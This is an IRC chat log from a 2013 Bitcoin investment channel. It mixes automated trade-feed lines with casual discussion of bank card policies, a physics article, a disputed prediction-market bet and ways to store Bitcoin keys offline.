financial institution Sep 18 00:34:03 yeah Sep 18 00:34:13 [BTCTC] [S] [PETA-MINE] 6 @ 0.655 = 3.93 BTC [+] Sep 18 00:35:17 I don't get the logic behind: "You received some suspicious transactions. Obviously we'll let you keep doing transactions. Just not with your cards." Sep 18 00:36:15 [BTCTC] [S] [BASIC-MINING] 2 @ 0.11 = 0.22 BTC [+] Sep 18 00:36:44 What difference does it make? Sep 18 00:36:58 basically they're begging to die the dearth of irrelevance Sep 18 00:37:06 "if you don't do so and so we won't play with you" Sep 18 00:37:16 experience shows kids with that sort of mental issues end up in a corner. Sep 18 00:37:42 There's no suspicion of my cards being misused, there's suspicion on an incoming transaction which I confirmed I expected. Sep 18 00:38:03 Yeah. I still push accepting Bitcoins on businesses who don't Sep 18 00:38:45 1% fee for using BitPay or Coinbase with daily wires to your bank account. 1%, instant, not reversible. Sep 18 00:39:05 They like cards tho. Sep 18 00:39:46 i don't push it. let them come begging for it in their own time Sep 18 00:39:57 and then whine as to why it's 300 bitcoins worth 10k usd each by then Sep 18 00:40:22 Well I don't push it, more like casually pass the remark it would be quicker and safer to accept Bitcoin. Sep 18 00:40:28 there's no such thing as push-helping people. Sep 18 00:40:39 the only people that can be helped by others are on their knees. Sep 18 00:40:52 if not physically necessarily, then in a certaion metaphorical sense. Sep 18 00:40:59 a that's different yeah. Sep 18 00:41:20 [BTCTC] [S] [COGNITIVE] 20 @ 0.17957999 = 3.5916 BTC [+] {6} Sep 18 00:42:49 But no one listens. Probably won't until everyone start asking for it. Sep 18 00:43:22 [HAVELOCK] [B] [XBOND] 15 @ 0.001248 = 0.0187 BTC [+] Sep 18 00:44:07 you know how it is, trends chance upon capitulation. Sep 18 00:44:12 change* Sep 18 00:44:23 [BTCTC] [S] [LABCOIN] 24 @ 0.002481 = 0.0595 BTC [-] Sep 18 00:47:47 oh he will? Sep 18 00:47:58 didnt know. Sep 18 00:50:21 prolly Sep 18 00:50:29 [BTCTC] [S] [BASIC-MINING] 4 @ 0.1081 = 0.4324 BTC [-] Sep 18 00:50:32 should i start a bet ? :D Sep 18 00:53:31 [BTCTC] [S] [LABCOIN] 100 @ 0.002504 = 0.2504 BTC [+] {2} Sep 18 00:54:32 [BTCTC] [S] [ACTIVEMINING] 20 @ 0.002564 = 0.0513 BTC [+] Sep 18 00:55:10 who will what now? Sep 18 00:55:33 [BTCTC] [S] [LABCOIN] 44 @ 0.002489 = 0.1095 BTC [-] {2} Sep 18 00:56:34 [BTCTC] [S] [LABCOIN] 24 @ 0.002476 = 0.0594 BTC [-] Sep 18 00:57:35 [BTCTC] [S] [LABCOIN] 25 @ 0.002453 = 0.0613 BTC [-] Sep 18 00:57:35 [BTCTC] [S] [BITVPS] 3 @ 0.001989 = 0.006 BTC [+] Sep 18 01:01:39 ;;seen burnside Sep 18 01:01:39 burnside was last seen in #bitcoin-assets 7 weeks, 6 days, 3 hours, 25 minutes, and 57 seconds ago: lol Sep 18 01:01:57 ;;seen mircea_popescu Sep 18 01:01:57 mircea_popescu was last seen in #bitcoin-assets 11 minutes and 24 seconds ago: should i start a bet ? :D Sep 18 01:02:04 you should start a bet Sep 18 01:04:42 [BTCTC] [S] [BASIC-MINING] 50 @ 0.10687599 = 5.3438 BTC [-] {4} **** BEGIN LOGGING AT Wed Sep 18 07:25:51 2013 Sep 18 07:36:05 [BTCTC] [S] [LABCOIN] 1498 @ 0.002526 = 3.7839 BTC [+] Sep 18 07:38:07 [BTCTC] [S] [LABCOIN] 52 @ 0.002528 = 0.1315 BTC [+] {2} Sep 18 07:39:08 [BTCTC] [S] [LABCOIN] 2932 @ 0.00255471 = 7.4904 BTC [+] {7} Sep 18 07:40:09 [BTCTC] [S] [LABCOIN] 392 @ 0.002588 = 1.0145 BTC [+] Sep 18 07:41:10 [BTCTC] [S] [LABCOIN] 75 @ 0.002658 = 0.1994 BTC [+] Sep 18 07:44:13 [BTCTC] [S] [LABCOIN] 3790 @ 0.00266488 = 10.0999 BTC [+] {4} Sep 18 07:46:15 [BTCTC] [FN] [DMS.PURCHASE] 200 @ 0.009339 = 1.8678 BTC [+] Sep 18 07:49:18 [BTCTC] [S] [DMS.MINING] 139 @ 0.002495 = 0.3468 BTC [+] Sep 18 07:55:24 [BTCTC] [FN] [DMS.PURCHASE] 15 @ 0.009339 = 0.1401 BTC [+] Sep 18 08:04:33 [MPEX] [S] [S.MPOE] 4950 @ 0.00092112 = 4.5595 BTC [+] Sep 18 08:04:34 [HAVELOCK] [B] [XBOND] 3500 @ 0.0012 = 4.2 BTC [+] Sep 18 08:05:45 ;;diff Sep 18 08:05:51 112628548.66635 Sep 18 08:14:14 ;;diffchange Sep 18 08:14:16 Estimated percent change in difficulty this period | 16.8624 % based on data since last change | 19.86204 % based on data for last three days Sep 18 08:22:34 http://trilema.com/2013/xidiffsep-has-settled/ Sep 18 08:22:36 X.IDIFF.SEP has settled pe Trilema - Un blog de Mircea Popescu. Sep 18 08:25:55 [BTCTC] [FN] [DMS.PURCHASE] 93 @ 0.009339 = 0.8685 BTC [+] Sep 18 08:26:56 [BTCTC] [S] [ASICMINER-PT] 7 @ 2.07485713 = 14.524 BTC [+] {4} Sep 18 08:39:08 [HAVELOCK] [S] [HIM] 1 @ 0.18 BTC [+] Sep 18 08:53:22 [HAVELOCK] [S] [CFIG] 3 @ 0.14 = 0.42 BTC [-] Sep 18 08:57:26 mircea_popescu: https://www.simonsfoundation.org/quanta/20130917-a-jewel-at-the-heart-of-quantum-physics/ Sep 18 08:58:32 o hey. pretty cool. Sep 18 08:58:48 it's coming Sep 18 08:58:55 imagine the shark song from jaws Sep 18 08:58:59 dun dun dun dun udn Sep 18 08:59:01 dun* Sep 18 09:01:54 "pysicists must also prove that the new geometric formulation applies to the exact particles that are known to exist in the universe, rather than to the idealized qft they used to develop it called maximally supersymmetric Yang-Mills theory. this model, which includes a "superpartner" particle (gotta look at that) and treats space-time as flat, "just happens to be the simplest test case for these new Sep 18 09:01:55 tools" Sep 18 09:01:57 gotcha bitch Sep 18 09:02:06 you know this is by no means very new right ? Sep 18 09:02:11 nah Sep 18 09:02:23 just a neat collection of facts Sep 18 09:02:26 well Sep 18 09:02:34 a neat collection of math wankery to be unkind Sep 18 09:03:21 i mention it because it references a pretty efficient way to do some aspects of modeling of quantum states Sep 18 09:03:22 they;ve been diddling with drawing it for... 30 years ? Sep 18 09:03:25 i guess the name is new. Sep 18 09:03:31 [BTCTC] [S] [BASIC-MINING] 251 @ 0.10123224 = 25.4093 BTC [-] {16} Sep 18 09:05:57 nominally the doing away with space and time as different things is new Sep 18 09:06:34 [BTCTC] [S] [ET.DIFF.LONG] 533 @ 0.01199932 = 6.3956 BTC [+] {3} Sep 18 09:07:35 does it change the idea of a Calabiâ-Yau structure to the Amplituhedron? Sep 18 09:08:06 got me Sep 18 09:08:36 [BTCTC] [S] [LABCOIN] 600 @ 0.002666 = 1.5996 BTC [+] Sep 18 09:08:51 wouldn't be the first time one group of braniacs came up with a new name for an old thing discovered by mathematicians Sep 18 09:09:07 mod6 on the face of it there's a brighjt young canadian guy and his grad student that either found some shortcut in c-y or else are just repackaging it for the media buzz. Sep 18 09:09:17 i can't immediately discern and meh, i have a bunch of other shit to do atm Sep 18 09:09:37 [BTCTC] [S] [LABCOIN] 10047 @ 0.00276554 = 27.7854 BTC [+] {19} Sep 18 09:09:45 mp how do you know all of the things Sep 18 09:09:48 heheh, im with you. i dont have a ton of time to compare each. Sep 18 09:09:58 http://en.wikipedia.org/wiki/Calabi–Yau_manifold that, ftr. Sep 18 09:10:08 benkay it's my slaves. they teach me a ton of shit. Sep 18 09:10:25 i need slaves Sep 18 09:10:34 yah that, should have posted a link. Sep 18 09:10:38 [BTCTC] [S] [LABCOIN] 203 @ 0.00279128 = 0.5666 BTC [+] {3} Sep 18 09:11:01 where did you get slaves that taught you about der quantz? Sep 18 09:11:15 at the bar! Sep 18 09:11:21 where do you meet womenz ? Sep 18 09:11:28 at the bar Sep 18 09:11:32 in their offices Sep 18 09:11:44 industry events Sep 18 09:12:00 but but Sep 18 09:12:02 something like that. principally by recomendation. Sep 18 09:12:34 recommendation to them or to bars? Sep 18 09:13:42 "dude, you gotta talk to X, she's cute/cool/knows der quantz. come by my place friday ?" Sep 18 09:14:08 many years of doing this not in timisoara Sep 18 09:14:19 it's tjhe internet dawg. dun matter where you are. Sep 18 09:15:28 irc, forums, various games Sep 18 09:15:44 tactics i suppose Sep 18 09:15:52 i'm still mising holistic strategy Sep 18 09:15:59 da fuck is that ? Sep 18 09:16:12 strategy? Sep 18 09:17:18 a ok. Sep 18 09:17:20 i'm just wondering about tactics and then saying that tactics aren't the right place to focus, strategy is, and that i have yet to wrap my head around the governing strategy that results in an army of slaves that teach you qft. Sep 18 09:17:30 what's the hurry anyway. Sep 18 09:17:51 well as soon as i realize i'm studying tactics i generally stop Sep 18 09:17:58 'cause foundations first? Sep 18 09:18:46 [HAVELOCK] [S] [HIM] 1 @ 0.18 BTC [+] Sep 18 09:19:11 im not sure there's an imbalance of that kind. you can get to be a great chess player either practically, spending all your time in central park playing chess with the dudes Sep 18 09:19:23 or theoretically, never even touching a chess table, studying graphs or w/e Sep 18 09:19:35 matter of what suits you best i guess. Sep 18 09:19:47 i shoot for some balance Sep 18 09:19:53 tweak it Sep 18 09:19:55 read a bunch Sep 18 09:20:02 build a bunch Sep 18 09:20:11 drink a bunch of beers with the well-capitalized Sep 18 09:20:27 build more stuff Sep 18 09:20:27 jhehe. dun see anything wrong with that plan. Sep 18 09:20:43 it's slow. i'm impatient. Sep 18 09:20:48 hence what's the hurry. Sep 18 09:21:30 fundamental tension of my life Sep 18 09:21:40 sales take forever to close Sep 18 09:21:49 just relax eh. Sep 18 09:23:13 okay :) Sep 18 09:23:43 but only in as a joke about your long-running schtick about "shutting up and doing as one's told by one's betters" Sep 18 09:23:53 lol Sep 18 09:24:14 in any case i wouldn't read too much into the happenstance that i know what c-y is. shit looks cool, it's naturally interesting to my particular mindset. Sep 18 09:24:33 it's not the case that i know ALL OF THE THINGS to the degree i can immediately summarize any argument of any deepness in any field. Sep 18 09:27:55 [HAVELOCK] [S] [AM100] 7 @ 0.01959999 = 0.1372 BTC [+] Sep 18 09:29:57 [BTCTC] [S] [LABCOIN] 3674 @ 0.00250842 = 9.2159 BTC [-] {11} Sep 18 09:30:58 [BTCTC] [S] [LABCOIN] 7794 @ 0.00244662 = 19.069 BTC [-] {24} Sep 18 09:30:58 [BTCTC] [S] [BASIC-MINING] 6 @ 0.0957 = 0.5742 BTC [-] Sep 18 09:31:59 [BTCTC] [S] [BASIC-MINING] 4 @ 0.0957 = 0.3828 BTC [-] Sep 18 09:41:37 The work is â€"Very unexpected from several points of vi,," said Witten. "The field is still developing very fast, and it is difficult to guess what will happen or what the lessons will turn out to be." Sep 18 09:41:47 *view Sep 18 09:43:34 <3 Ed Witten Sep 18 09:51:18 [BTCTC] [S] [LABCOIN] 90 @ 0.00254659 = 0.2292 BTC [-] {4} Sep 18 09:53:20 [BTCTC] [S] [LABCOIN] 4000 @ 0.00272659 = 10.9064 BTC [+] {8} Sep 18 09:53:27 ;;nethash Sep 18 09:53:27 966448.247171 Sep 18 09:54:19 ;;bc,stats Sep 18 09:54:22 Current Blocks: 258596 | Current Difficulty: 1.1262854866634709E8 | Next Difficulty At Block: 260063 | Next Difficulty In: 1467 blocks | Next Difficulty In About: 1 week, 2 days, 14 hours, 7 minutes, and 3 seconds | Next Difficulty Estimate: 130934805.233 | Estimated Percent Change: 16.25366 Sep 18 10:09:55 http://www.dailymail.co.uk/news/article-2422753/Security-expert-breaches-NASDAQ-website-just-10-minutes-using-Firefox-web-browser.html Sep 18 10:09:57 Security expert breaches NASDAQ website in just 10 minutes using only Firefox web browser | Mail On Sep 18 10:12:39 [BTCTC] [S] [ASICMINER-PT] 3 @ 2.047 = 6.141 BTC [-] Sep 18 10:13:22 http://www.aeonmagazine.com/being-human/david-berreby-obesity-era/ Sep 18 10:13:35 apparently not just people are getting fatter. ursides and rodents too. Sep 18 10:25:10 he notified NASDAQ of the vulnerability multiple times only to be ignored. Sep 18 10:25:13 Read more: http://www.dailymail.co.uk/news/article-2422753/Security-expert-breaches-NASDAQ-website-just-10-minutes-using-Firefox-web-browser.html#ixzz2fE7HkYKS Sep 18 10:25:17 bah. Sep 18 10:25:25 i like that part :> Sep 18 10:25:40 hehe. yeah. Sep 18 10:26:07 unrelatedly, Sep 18 10:26:08 "There is no likelihood man can ever tap the power of the atom. The glib supposition of utilizing atomic energy when our coal has run out is a completely unscientific Utopian dream, a childish bug-a-boo. Nature has introduced a few fool-proof devices into the great majority of elements that constitute the bulk of the world, and they have no energy to give up in the process of disintegration." Sep 18 10:26:16 milikan :D Sep 18 10:26:40 haha Sep 18 10:27:16 "any one who expects a source of power from the transformation of these atoms is talking moonshine" Sep 18 10:27:17 rutherford. Sep 18 10:27:33 i guess that's how far "scientific consensus" goes. Sep 18 10:27:46 cca 1920 it was the scientific consensus that we will never have nuclear reactors. Sep 18 10:29:41 i guess "scientific consensus" usually prohibits its constituants to dream and imagine. Sep 18 10:30:19 this is fact. as explained by kuhn et all, scientific endeavour is impossible absent some sort of paradigm. Sep 18 10:30:43 you gotta throw out large swathes of "possibilities" in order to be able to do something useful. Sep 18 10:30:50 which reminds me : "Production of useful work is limited by the laws of thermodynamics, but the production of useless work seems to be unlimited." Sep 18 10:31:17 haha. Sep 18 10:31:19 ya Sep 18 10:47:13 [BTCTC] [FN] [DMS.SELLING] 75 @ 0.00680364 = 0.5103 BTC [-] {2} Sep 18 10:48:14 [BTCTC] [FN] [DMS.SELLING] 500 @ 0.0068 = 3.4 BTC [-] Sep 18 10:49:15 [BTCTC] [S] [TAT.ASICMINER] 12 @ 0.01894333 = 0.2273 BTC [-] {2} Sep 18 10:51:17 [BTCTC] [S] [ASICMINER-PT] 2 @ 2.0755 = 4.151 BTC [+] {2} Sep 18 10:52:18 [BTCTC] [FN] [DMS.SELLING] 554 @ 0.00611484 = 3.3876 BTC [-] {3} Sep 18 10:53:19 [BTCTC] [S] [ASICMINER-PT] 1 @ 2.076 BTC [+] Sep 18 10:54:20 [BTCTC] [S] [TAT.ASICMINER] 67 @ 0.01929313 = 1.2926 BTC [+] {2} Sep 18 10:55:21 [MPEX] [S] [S.MPOE] 15350 @ 0.00092303 = 14.1685 BTC [+] {3} Sep 18 10:59:25 [BTCTC] [S] [ASICMINER-PT] 2 @ 2.047 = 4.094 BTC [-] Sep 18 11:10:36 [BTCTC] [S] [ACTIVEMINING] 200 @ 0.00262 = 0.524 BTC [-] Sep 18 11:19:45 [HAVELOCK] [B] [XBOND] 500 @ 0.00119931 = 0.5997 BTC [+] {2} Sep 18 11:27:53 [BTCTC] [S] [ASICMINER-PT] 3 @ 2.076 = 6.228 BTC [+] Sep 18 11:32:58 [BTCTC] [S] [ASICMINER-PT] 2 @ 2.076 = 4.152 BTC [+] Sep 18 11:33:30 mircea_popescu there? :) Sep 18 11:37:02 [BTCTC] [S] [ASICMINER-PT] 1 @ 2.077 BTC [+] Sep 18 11:40:27 yeah Sep 18 11:40:31 Ukyo sup ? Sep 18 11:41:06 [BTCTC] [S] [LABCOIN] 159 @ 0.00254646 = 0.4049 BTC [-] {6} Sep 18 11:42:07 [BTCTC] [S] [TAT.ASICMINER] 73 @ 0.0193 = 1.4089 BTC [+] Sep 18 11:49:14 [BTCTC] [S] [DMS.MINING] 331 @ 0.00240891 = 0.7973 BTC [-] {4} Sep 18 11:53:18 [BTCTC] [S] [BASIC-MINING] 5 @ 0.1069 = 0.5345 BTC [+] Sep 18 11:54:19 [BTCTC] [S] [COGNITIVE] 1 @ 0.2095 BTC [+] Sep 18 11:56:21 [BTCTC] [S] [DMS.MINING] 135 @ 0.002404 = 0.3245 BTC [+] Sep 18 11:57:22 [BTCTC] [S] [BASIC-MINING] 3 @ 0.1069 = 0.3207 BTC [+] Sep 18 11:58:23 [BTCTC] [S] [BASIC-MINING] 1 @ 0.1069 BTC [+] Sep 18 12:00:25 [BTCTC] [S] [RSM] 25 @ 0.006985 = 0.1746 BTC [-] Sep 18 12:01:26 [BTCTC] [S] [BASIC-MINING] 1 @ 0.1069 BTC [+] Sep 18 12:07:31 [BTCTC] [S] [BTC-TRADING-PT] 1 @ 0.9388 BTC [-] Sep 18 12:09:33 [BTCTC] [S] [LABCOIN] 54 @ 0.0024895 = 0.1344 BTC [+] {2} Sep 18 12:20:44 [BTCTC] [S] [LABCOIN] 41 @ 0.0025 = 0.1025 BTC [+] Sep 18 12:21:45 [BTCTC] [S] [ET.DIFF.LONG] 42 @ 0.012 = 0.504 BTC [+] Sep 18 12:29:45 what does that [S] means? Sep 18 12:31:55 [BTCTC] [S] [TAT.ASICMINER] 40 @ 0.01891 = 0.7564 BTC [-] Sep 18 12:35:19 Sell Sep 18 12:35:59 [BTCTC] [S] [ASICMINER-PT] 1 @ 2.047 BTC [-] Sep 18 12:38:31 nah stocks Sep 18 12:38:40 theres Stocks, Bonds, FuNds and Options Sep 18 12:42:05 [BTCTC] [S] [ASICMINER-PT] 1 @ 2.048 BTC [+] Sep 18 12:42:06 [BTCTC] [S] [TAT.ASICMINER] 92 @ 0.01903869 = 1.7516 BTC [+] {2} Sep 18 12:43:07 [BTCTC] [S] [TAT.ASICMINER] 14 @ 0.0193 = 0.2702 BTC [+] Sep 18 12:49:13 [BTCTC] [S] [COGNITIVE] 5 @ 0.17782 = 0.8891 BTC [-] {2} Sep 18 13:09:33 [BTCTC] [S] [ASICMINER-PT] 2 @ 2.046 = 4.092 BTC [-] {2} Sep 18 13:19:43 [HAVELOCK] [S] [AM100] 15 @ 0.01959 = 0.2939 BTC [-] Sep 18 13:21:45 [HAVELOCK] [S] [AM100] 10 @ 0.01959999 = 0.196 BTC [+] {2} **** BEGIN LOGGING AT Thu Sep 19 02:37:51 2013 Sep 19 02:38:46 [BTCTC] [S] [LABCOIN] 900 @ 0.002744 = 2.4696 BTC [+] Sep 19 02:38:46 [BTCTC] [S] [COGNITIVE] 4 @ 0.16 = 0.64 BTC [+] Sep 19 02:39:17 I'm jealous of your supporter mask, MP Sep 19 02:39:23 cloak, rather Sep 19 02:39:47 [BTCTC] [S] [LABCOIN] 17453 @ 0.00277579 = 48.4459 BTC [+] {17} Sep 19 02:40:48 [BTCTC] [S] [LABCOIN] 240 @ 0.00274 = 0.6576 BTC [-] Sep 19 02:41:49 [BTCTC] [S] [LABCOIN] 229 @ 0.00273997 = 0.6275 BTC [-] {3} Sep 19 02:43:09 whyssat ? Sep 19 02:43:51 [BTCTC] [S] [COGNITIVE] 2 @ 0.1552 = 0.3104 BTC [-] Sep 19 02:46:15 does MPEX have historical trade data accessible via API? Sep 19 02:47:43 via assbot, for instance. Sep 19 02:47:55 [BTCTC] [S] [LABCOIN] 1190 @ 0.00279347 = 3.3242 BTC [+] {3} Sep 19 02:48:19 looking for the real thing i mean Sep 19 02:48:27 something reliable Sep 19 02:49:57 mircea_popescu: assbot appears to sum trades together now :) Sep 19 02:50:24 I appeciate that feature actually Sep 19 02:50:34 but it compromises other things Sep 19 02:50:35 ThickAsThieves http://bitcoin-assets.com/mpex-socket/ Sep 19 02:50:43 thanks kako! Sep 19 02:50:58 :) Sep 19 02:51:12 Ukyo i think that's a display thing Sep 19 02:51:29 ah Sep 19 02:51:45 btw, it appears the labcoin address has had a deposit of some 3.x btc from slush's pool Sep 19 02:51:46 Ukyo i'ma be bugging you next! Sep 19 02:51:55 where's the for real API Sep 19 02:51:57 ThickAsThieves: I have an app for that. Sep 19 02:52:00 I need all your dataz Sep 19 02:52:07 ThickAsThieves other than that i've not yet made a data feed. waiting for a company to offer to do this, and convince me that it has a market above and beyond assbot. Sep 19 02:52:10 nah not an app Sep 19 02:52:32 mp I will be in touch sooner or later on that then Sep 19 02:52:33 but... "It' has the wifi's and the GBs" Sep 19 02:53:05 sure. Sep 19 02:54:01 [BTCTC] [S] [LABCOIN] 932 @ 0.00262815 = 2.4494 BTC [-] {3} Sep 19 02:54:23 mircea_popescu, in case you didnt parse the conv from earlier today, Sep 19 02:54:42 I need to put on my Annoying BitBet Customer Hat Sep 19 02:55:05 This bet resolved incorrectly: http://bitbet.us/bet/460/mt-gox-to-have-50-trade-volume/ Sep 19 02:55:18 Proof is here: http://data.bitcoinity.org/#caaaaadgaa Sep 19 02:55:35 looking at 8/28/13 Sep 19 02:55:37 sorry Sep 19 02:55:41 Aug 28 Sep 19 02:55:43 :) Sep 19 02:56:21 you have to use the link indicated in the bet tho. Sep 19 02:56:29 the bet link is dynamic Sep 19 02:56:33 which means at some point Sep 19 02:56:40 it would hav eproven the same Sep 19 02:56:49 just needed to be looking in the right day Sep 19 02:56:50 not necessarily. Sep 19 02:57:04 [MPEX] [S] [S.MPOE] 14550 @ 0.00091747 = 13.3492 BTC [-] {2} Sep 19 02:57:16 how does BitBet know it was false? Sep 19 02:57:19 your link currently reads for me " Something went terribly wrong" Sep 19 02:57:20 it checked every day? Sep 19 02:57:23 anyway, does it include all the markets ? Sep 19 02:57:45 it includes enough data to show that any more added markets would only make it more right Sep 19 02:58:03 maybe you need javascript? Sep 19 02:58:16 i don't follow that reasoning too well. but anyway : absent someone with a screenshot of the proper link, there's no basis to contest the bet. Sep 19 02:58:34 there's no basis to say it was false Sep 19 02:58:45 there's no basis to say anything Sep 19 02:58:48 bitbet does not need to show basis. Sep 19 02:58:55 zing Sep 19 02:58:58 you need to show basis if you wish to disagree. Sep 19 02:59:02 it needs to use data to decide Sep 19 02:59:06 [HAVELOCK] [S] [HIM] 5 @ 0.18998 = 0.9499 BTC [+] Sep 19 02:59:08 [BTCTC] [S] [ASICMINER-PT] 5 @ 2 = 10 BTC [+] Sep 19 02:59:35 if i were to get historical data from bitcoincharts.org and it showed it was true Sep 19 02:59:38 i'm kinda surprised at HIM's price Sep 19 02:59:42 would you then fix the issue? Sep 19 02:59:45 then you'd have a pretty good leg to stand on. Sep 19 03:00:04 unless there was some flaw in it. in case you're wondering btw, this has happened in the past Sep 19 03:00:07 [HAVELOCK] [S] [AM100] 7 @ 0.0175 = 0.1225 BTC [-] Sep 19 03:00:08 (once) Sep 19 03:00:10 seems like they're sitting on a bunch of mining hardware with very little prospect of roi Sep 19 03:00:12 [BTCTC] [S] [LABCOIN] 3270 @ 0.00271259 = 8.8702 BTC [+] {5} Sep 19 03:00:26 http://trilema.com/2013/the-anatomy-of-a-disaster/ Sep 19 03:00:27 there. Sep 19 03:00:29 The anatomy of a disaster pe Trilema - Un blog de Mircea Popescu. Sep 19 03:00:53 0.01 btc minimum? paste an address Sep 19 03:01:09 congrats, you've done what the globe & mail couldn't Sep 19 03:01:46 whassat ? Sep 19 03:01:56 convince me to pay for content Sep 19 03:02:00 lol Sep 19 03:02:03 1 sec Sep 19 03:02:09 [BTCTC] [S] [ASICMINER-PT] 1 @ 1.783 BTC [-] Sep 19 03:05:48 $avg Sep 19 03:05:50 mircea_popescu: 131.15 Sep 19 03:11:10 what's everyone's thoughts on using brain wallets for cold storage? Sep 19 03:11:19 [BTCTC] [S] [LABCOIN] 1550 @ 0.00283802 = 4.3989 BTC [+] {3} Sep 19 03:11:45 if you've never made original contributions to a scientific field your mind is probably too banal for the brain wallet to be safer than the alternatives. Sep 19 03:13:07 well, 'Password1' obv isn't going to cut it Sep 19 03:13:27 but let's assume that one is intelligent enough to create a passphrase with a very high level of entropy Sep 19 03:13:44 then we can assume the wallet will be safe. Sep 19 03:14:25 y'know, i'm realizing that this isn't a terribly complicated topic to discuss Sep 19 03:14:40 :p Sep 19 03:15:22 anyway, seems a lot easier than keeping backups of wallet.dat files in encrypted usb drives in bank vaults Sep 19 03:15:23 [BTCTC] [S] [LABCOIN] 485 @ 0.002829 = 1.3721 BTC [-] Sep 19 03:15:23 [HAVELOCK] [S] [HIM] 5 @ 0.18998 = 0.9499 BTC [+] Sep 19 03:15:52 while sacrificing nothing in the way of security, as long as it's done properly Sep 19 03:15:56 why not pull a breaking bad mr. nubbins` Sep 19 03:16:01 print out a paper wallet Sep 19 03:16:04 destroy all back ups Sep 19 03:16:08 bury paper wallet in desert Sep 19 03:16:16 put gps coordinates on lotto ticket Sep 19 03:16:17 what if he needs it one day ? Sep 19 03:16:21 i don't have reliable access to plastic barrels Sep 19 03:16:26 YISS Sep 19 03:16:28 :D Sep 19 03:16:31 and, what if i need it one day Sep 19 03:16:44 go unbury your 10000 btc from the desert Sep 19 03:17:06 he's gonna be out there digging ditches with nicky santoro. Sep 19 03:17:08 better hope GPS accuracy is really tight on that particular day Sep 19 03:17:32 "A lot of holes in the desert, and a lot of problems are buried in those holes. But you gotta do it right. I mean, you gotta have the hole already dug before you show up with a package in the trunk. Otherwise, you're talking about a half-hour to forty-five minutes worth of digging. And who knows who's gonna come along in that time? Pretty soon, you gotta dig a few more holes. You could be there all fuckin' night." Sep 19 03:18:20 lel Sep 19 03:18:34 i was living in a rental once, and the landlord was showing some new prospective tenants around Sep 19 03:18:38 this guy walks in Sep 19 03:18:51 "any idiots or sketch-bags around here? 'cause i don't wanna be digging' holes" Sep 19 03:19:11 although i was torn, i eventually chose the response "just us" Sep 19 03:19:29 lol Sep 19 03:20:29 some other time, two chicks living together, landlord comes to do the same thing with a young goofy married couple. Sep 19 03:20:51 one of the two says "oh, i rent here, but she comes with the place". Sep 19 03:21:02 dood was drooling so hard his wife didn't want to rent anymore. Sep 19 03:21:05 lel Sep 19 03:21:51 mircea_popescu what would be the ideal solution for a lemming storing btc "securely" Sep 19 03:22:02 or is security not a privelage the stupid deserve? Sep 19 03:22:20 strangely you can spell security but not privilege! Sep 19 03:22:21 paper wallet printed from offline machine Sep 19 03:22:26 but hey Sep 19 03:22:26 XD Sep 19 03:22:30 [BTCTC] [S] [ASICMINER-PT] 1 @ 1.797 BTC [+] Sep 19 03:22:36 lemmings don't have offline machines Sep 19 03:23:06 but yeah, the best security is having a cheap laptop you don't use for anything else. generate a wallet and some gpg keys. Sep 19 03:23:22 you can email your wallet to yourself in gpg encrypted form for backup, and just hang on tight to the laptop. Sep 19 03:23:25 know what would be spiffy? mechanical btc engine, a la Kurta. Sep 19 03:23:29 the ultimate 'offline'. Sep 19 03:23:30 if it's inconvenient, people are going to compromise Sep 19 03:23:39 so I am really skeptical of paper wallets Sep 19 03:23:39 anyone can afford/use a cheapo old laptop Sep 19 03:23:42 and nobody's stealing that. Sep 19 03:23:48 y'know, a printer/scanner combo would be a great thing for a cold machine to have. Sep 19 03:23:52 how about those hw wallets for ze noobs Sep 19 03:24:07 meh. i dont trust hardware these days. Sep 19 03:24:08 nobody's stealing it because it's old? Sep 19 03:24:16 or nobody's stealing it because GPG is hard to crack? Sep 19 03:24:25 thestringpuller yeah. who do you think steals a laptop you got for 180 on ebay ? Sep 19 03:24:32 [HAVELOCK] [S] [AM100] 6 @ 0.01799 = 0.1079 BTC [+] Sep 19 03:24:36 notbad.jpg Sep 19 03:24:40 bonus if it's covered in stickers Sep 19 03:24:47 lolol hipster laptops Sep 19 03:24:49 anything valuable, you wanna ruin with stickers Sep 19 03:24:50 no one steals those Sep 19 03:24:54 stuff some pubes under the spacebar Sep 19 03:24:56 that kinda thing Sep 19 03:25:01 burglars are dumb. I know from experience Sep 19 03:25:09 lol "this thing only has pubes and screenplays, I can't pawn this" Sep 19 03:25:11 they don't know what's valuable Sep 19 03:25:22 dumb enough to throw anything vaguely-laptop-like in a sack and look afterwards. Sep 19 03:25:33 with that logic you could make a poster with public private key that sits next to your bed Sep 19 03:25:36 anyway, cold machine with printer/scanner: you wanna decrypt a message, just print it from your hot machine and do OCR on the cold machine Sep 19 03:25:36 i was on a jury where an idiot did exactly this Sep 19 03:25:42 saves all that pesky manual transcription Sep 19 03:25:44 no burglar gonna steal a poster Sep 19 03:25:56 nubbins` you can trivially put a qr reader Sep 19 03:25:58 anyway laptops, even without bitcoin, can easily be more valuable for their data Sep 19 03:26:01 cheaper, faster, just as good. Sep 19 03:26:01 too true Sep 19 03:26:05 cheap webcam Sep 19 03:26:34 tougher for gpg tho Sep 19 03:26:45 pankkake you know, i've never been burglarized ? Sep 19 03:26:48 but why would you care? encrypt, put backups everywhere Sep 19 03:27:46 "My bank won't wire transfer to Slovenia (Bitstamp) says that it is a sanctioned country." Sep 19 03:27:56 probably got it mixed up with syria Sep 19 03:28:01 or somalia. Sep 19 03:28:04 or siberia Sep 19 03:28:08 Silly Americans. Sep 19 03:28:10 siberia is not a country. Sep 19 03:28:22 tell that to the people advocating military strikes against it Sep 19 03:28:36 [BTCTC] [S] [ASICMINER-PT] 1 @ 1.813 BTC [+] Sep 19 03:28:47 zbigniew brzezinski has a map in his evil plotting room where it *is* a country Sep 19 03:28:47 actually, don't; you'll only draw attention to yourself Sep 19 03:29:15 asciilifeform lol good point. Sep 19 03:30:19 btw nubbins` next time the marketing herpderps wish to know how come i get more traffic rthan the globe&mail i'ma quote you to them. Sep 19 03:31:08 that, and there's less vitriol in the comments on trilema Sep 19 03:31:17 take that as a compliment or a slight Sep 19 03:31:43 lol Sep 19 03:31:54 actually my comment section is usually better than the articles. Sep 19 03:32:03 present company excluded of course. Sep 19 03:32:40 [BTCTC] [S] [DMS.MINING] 220 @ 0.002399 = 0.5278 BTC [+] {2} Sep 19 03:32:53 natch Sep 19 03:33:25 and i agree Sep 19 03:33:40 comment sections are usually abysmal intellectual wastelands Sep 19 03:34:03 where the open-mouthed and the dull-eyed spill their half-baked opinions Sep 19 03:34:42 [BTCTC] [S] [ACTIVEMINING] 1108 @ 0.0026 = 2.8808 BTC [+] Sep 19 03:34:43 re open-mouthed http://de-motivational-posters.com/images/alien-no-cocksucker.jpg Sep 19 03:34:46 never realizing that they're unpaid actors in a reality show called "morons on the internet" Sep 19 